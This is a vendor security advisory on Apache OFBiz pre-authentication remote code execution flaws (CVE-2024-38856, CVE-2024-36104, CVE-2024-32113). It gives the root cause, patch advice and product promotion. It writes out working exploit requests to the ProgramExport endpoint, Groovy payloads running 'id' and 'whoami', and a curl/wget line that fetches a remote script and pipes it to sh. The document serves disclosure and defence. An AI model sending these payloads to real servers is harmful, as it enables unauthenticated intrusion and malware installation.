CVE-2024-38856 –Apache OFBiz Pre-Auth RCE Vulnerability

Posted DateAugust 14, 2024
Posted Time 5   min Read

A new zero-day vulnerability, CVE-2024-38856, has been discovered in the Apache OFBiz open-source enterprise resource planning (ERP) platform, presenting a critical threat to businesses worldwide.

This pre-authentication remote code execution (RCE) flaw allows unauthenticated attackers to exploit weaknesses in OFBiz’s request handling, leading to unauthorized access and potentially damaging control over affected systems.  

What’s even more concerning is that it builds on the foundation of a previously discovered vulnerability, CVE-2024-36104, making the issue even more severe.

CVE-2024-38856: Critical RCE Flaw Overview

Risk Analysis

Severity: High
CVSSv3.1: Base Score:8.1 Medium
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
NVD score not yet provided

Exploit available in public: Yes
Exploit complexity: Low
 
CVE-2024-38856 is a significant security flaw within the Apache OFBiz framework. This vulnerability resides in the override view functionality, which fails to properly authenticate requests for critical endpoints.

Specifically, it allows an unauthenticated attacker to chain the ProgramExport endpoint with other non-authenticated endpoints, enabling the execution of malicious code on the affected system. This zero day vulnerability highlights a severe lapse in how OFBiz handles authentication, particularly in scenarios where multiple endpoints are involved in processing a single request.

Linked to Previous Vulnerability: CVE-2024-36104

Risks Analysis

Severity: Critical
CVSSv3.1: Base Score:9.1 Medium
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
NVD score not yet provided

Exploit available in public: Yes
Exploit complexity: Low

CVE-2024-38856 is particularly concerning because it bypasses a patch applied for CVE-2024-36104, an earlier vulnerability that also facilitated RCE through path traversal. CVE-2024-36104 exploited improper restrictions on special characters within HTTP request URLs, allowing attackers to navigate through system directories and execute arbitrary code.

The recent patch bypass suggests that the initial fix did not fully address the underlying authentication and request processing issues, leaving OFBiz systems vulnerable to sophisticated attack chains. Moreover, this new flaw was identified while analyzing the patch for CVE-2024-36104, indicating that the exploitation of OFBiz vulnerabilities is an ongoing concern.

Technical Details & Vulnerability Exploitation  

Example of Malicious Request (CVE-2024-36104):

POST /webtools/control/forgotPassword/;%2e%2e/ProgramExport
POST-Body: groovyProgram=throw new Exception('whoami'.execute().text);

The introduction of CVE-2024-38856 escalates the risk. This latest vulnerability enables unauthorized access to the ProgramExport endpoint without relying on a path traversal vector. This means attackers can achieve the same level of control with a more straightforward, albeit still malicious, request.

Example of Malicious Request (CVE-2024-38856):

POST /webtools/control/forgotPassword/ProgramExport
POST-Body:
groovyProgram= \u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

Decoded Request:

groovyProgram=throw new Exception('id'.execute().text);

The Root Cause: A Discrepancy in Request Handling

CVE-2024-38856  stems from a discrepancy in how Apache OFBiz processes different parts of a request. Specifically, the system uses two values: requestUri for authentication checks and overrideViewUri to determine which page is rendered. Ideally, both should handle the same endpoint, but this isn’t the case.

Attackers can exploit this by sending requests to endpoints like /webtools/control/forgotPassword/ProgramExport. The system incorrectly assumes that only the initial part (e.g., forgotPassword) requires authentication, allowing the latter part (ProgramExport) to execute without further checks.

Common Exploitation URLs:

POST /webtools/control/forgotPassword/ProgramExport
POST /webtools/control/main/ProgramExport
POST /webtools/control/showDateTime/ProgramExport
POST /webtools/control/view/ProgramExport
POST /webtools/control/TestService/ProgramExport

This oversight is rooted in the flawed logic within the RequestHandler.java file, where the inconsistent handling of these URIs allows security checks to be applied to the wrong part of the request.

Further Implications: CVE-2024-32113

Risk Analysis

Severity: Critical
CVSSv3.1: Base Score:9.8 Critical
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD score not yet provided

Exploit available in public: Yes
Exploit complexity: Low

Adding to the severity of the situation is CVE-2024-32113, another critical path traversal vulnerability in OFBiz. It allows attackers to access restricted directories by exploiting flaws in URI processing. This vulnerability, which affects OFBiz versions before 18.12.13, has already been exploited in the wild, including in attacks deploying the Mirai botnet.

The existence of multiple severe vulnerabilities within the same software underscores the need for immediate action by organizations using Apache OFBiz.

Mitigation and Recommended Actions

Apache has released patches to address these vulnerabilities. Organizations running OFBiz versions 18.12.14 or earlier are strongly urged to upgrade to version 18.12.15 or later to mitigate the risks posed by these vulnerabilities. With these vulnerabilities being actively exploited, immediate patching is essential.

In addition to applying patches, organizations should conduct thorough security audits to ensure no residual risks remain from previous vulnerabilities.

AppTrana Coverage on RCE Vulnerabilities

Built to protect web applications and APIs, AppTrana WAAP delivers comprehensive protection by actively detecting and addressing threats in real-time. Protection against this Authentication bypass vulnerability is covered under our default CRS (Core Rule Set) rules.

AppTrana WAAP’s Comprehensive Defense Against Vulnerability Exploitation:

  • Vulnerability Scanning and Assessment – Bundled with a DAST scanner, AppTrana WAAP regularly performs vulnerability scans and assessments on your web applications.
  • Managed WAF – AppTrana’s fully managed WAF serves as a robust defense, protecting your applications from potential threats and zero-day exploits.

Indusface’s managed team has implemented a custom rule that proactively blocks any attempts to exploit authentication bypass vulnerabilities.

Below are the snapshots of AppTrana WAAP blocking the POC exploitation of the CVE’s:

CVE-2024-38856

Proof of Concepts (PoCs) for multiple exploitaions

  1. Decoded Payload: throw new Exception('id'.execute().text);

CVE-2024-38856-POC example showing how AppTrana blocks unauthorized commands

  1. Decoded Payload: throw new Exception('whoami'.execute().text);

CVE-2024-38856 - Decoded payload running 'whoami' command, showcasing AppTrana's prevention of unauthorized code execution.

  • Decoded Payload: throw+new+Exception('curl http://example.com/sh | sh -s ofbiz || wget -O- http://example.com/sh | sh -s ofbiz'.execute().text);

An example of a POST request related to CVE-2024-38856. The request body contains an encoded payload executing a remote script, with the resulting output displayed.

CVE-2024-36104

POC  – Unicode Encoded Payload Exploit Successfully Blocked

CVE-2024-36104 - Successful Blocking of Exploit with Unicode encoded payload

POC – Plain Exploit Successfully Blocked

CVE-2024-36104-Successful Blocking of POC in a plain exploit-AppTrana WAAP

CVE-2024-32113

POC  – Unicode Encoded Payload Exploit Successfully Blocked

CVE-2024-32113 - Successful Blocking of Exploit with Unicode encoded payload

POC – Plain Exploit Successfully Blocked

An illustration showing the successful blocking of an exploit attempt related to CVE-2024-32113

Stay tuned for more relevant and interesting security articles. Follow Indusface on FacebookTwitter, and LinkedIn.

AppTrana WAAP

 

Pavan Bhushan Reddy
Pavan Bushan Reddy

Pavan Bushan Reddy is an Security Researcher at Indusface. He is deeply involved in fortifying web application security through the development and optimization of Indusface WAF Rules ensuring robust protection against potential threats, complemented by in-depth vulnerability research and comprehensive Zero-day Coverage. He has done PG Diploma in IT Infrastructure, Systems and security at CDAC. Pavan is very much Passionate in cyber defense and Pentesting also he is a CTF player in HackTheBox.

Share Article:

Join 51000+ Security Leaders

Get weekly tips on blocking ransomware, DDoS and bot attacks and Zero-day threats.

We're committed to your privacy. indusface uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.